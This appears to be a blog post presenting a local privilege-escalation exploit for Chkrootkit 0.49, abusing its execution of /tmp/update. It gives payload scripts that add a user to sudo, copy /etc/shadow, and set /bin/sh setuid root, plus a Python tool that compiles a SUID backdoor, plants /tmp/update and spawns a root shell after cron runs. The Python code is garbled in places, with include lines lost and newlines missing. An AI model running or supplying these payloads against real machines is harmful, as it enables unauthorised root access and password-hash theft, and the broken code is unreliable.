Hello !

Security researchers have found an local exploit for Chkrootkit 0.49 who allow to a simple user to make root’s commands (the current Chkrootkit version is 0.50)

Proof of concept

When Chkrootkit is executed a file ‘/tmp/update’ is executed with the permissions of user who launched Chkrootkit .

For launch Chkrootkit we use sudo for run it as superuser like this

sudo chkrootkit

if we run it as a simple user like this :

hd@kali:/root$ chkrootkit

chkrootkit need root privileges

We must run Chkrookit as root , so the file ‘/tmp/update’ too .

Now we can create ‘/tmp/update’ for become root .

Privileges escalation

Make a user sudoer

#!/bin/bash

adduser bob sudo

Read /etc/shadow

#!/bin/bash

cat /etc/shadow > /tmp/shadow

and you read /tmp/shadow .

Get a root shell

#!/bin/bash

chown root:root /bin/sh ; chmod 4777 /bin/sh

For get a root shell you must execute ‘/bin/sh’

bash-4.4$ whoami

hd

bash-4.4$ /bin/sh

# whoami

root

#

Don’t forget to chmod ‘tmp/update’

chmod +x /tmp/update

End



'/tmp/update' is executed every time when Chkrootkit is executed so check the cron for find when chkrootkit is launched .

After this the content of '/tmp/update' file will be executed and you can become root or make command as root .

Exploit's doc : https://www.exploit-db.com/exploits/33899/



I've made a tool in python to get r00t using this exploit





#!/usr/bin/python

import commands

import sys

import time

import os

chkrootkit = '/usr/sbin/chkrootkit'

print("[*] checking if chkrootkit is installed")

try:

if (os.path.exists(chkrootkit)) == True :

print ("[+] chkrootkit is installed ")

if (os.path.exists(chkrootkit)) == False :

print ("[-] chkrootkit isn't installed ")

except :

sys.exit("[-] chkrootkit is not installed")

print("[*] checking if chkrootkit's version is vulnerable")

sortie = (commands.getoutput("{} -V ".format(chkrootkit)))

if "0.49" in (sortie):

print("[+] chkrootkit is vulnerable")

elif not "0.49" in (sortie):

print("[-] chkrootkit is not vulnerable")

sys.exit()

print("[*] writting SUID executable ")

fichier = open("/var/tmp/suid.c","w")

#simple SUID backdoor

fichier.write("#include

")

fichier.write("#include

")

fichier.write("#include

")

fichier.write("#include

")

fichier.write("")

fichier.write("int main()

")

fichier.write("{")

fichier.write("setuid(0);

")

fichier.write('system("$SHELL");

')

fichier.write("return 0;

")

fichier.write("}

")

fichier.close()

print("[*] compiling SUID executable")

os.system("gcc /var/tmp/suid.c -o /var/tmp/suid")

print("[*] exploit chkrootkit vulnerability ")

update = open("/tmp/update","w")

update.write("#!/bin/bash")

update.write("chown root:root /var/tmp/suid ; chmod 4755 /var/tmp/suid")

os.system("chmod +x /tmp/update")

print("")

print("")

print("[*] waiting 5 minutes before chkrootkit execute our backdoor with root permissions")

time.sleep(300)

if "-rwsr-xr-x" in (commands.getoutput("ls -lah /var/tmp/suid")) :

print("got r00t ? ")

os.system("/var/tmp/suid")

elif "-rwsr-xr-x" not in (commands.getoutput("ls -lah /var/tmp/suid")) :

print("""[-] chkrootkit wasn't executed by crontab in 5 minutes ... You need wait chkrootkit's execution by crontab then you execute /var/tmp/suid and you will get an root-shell """)

sys.exit()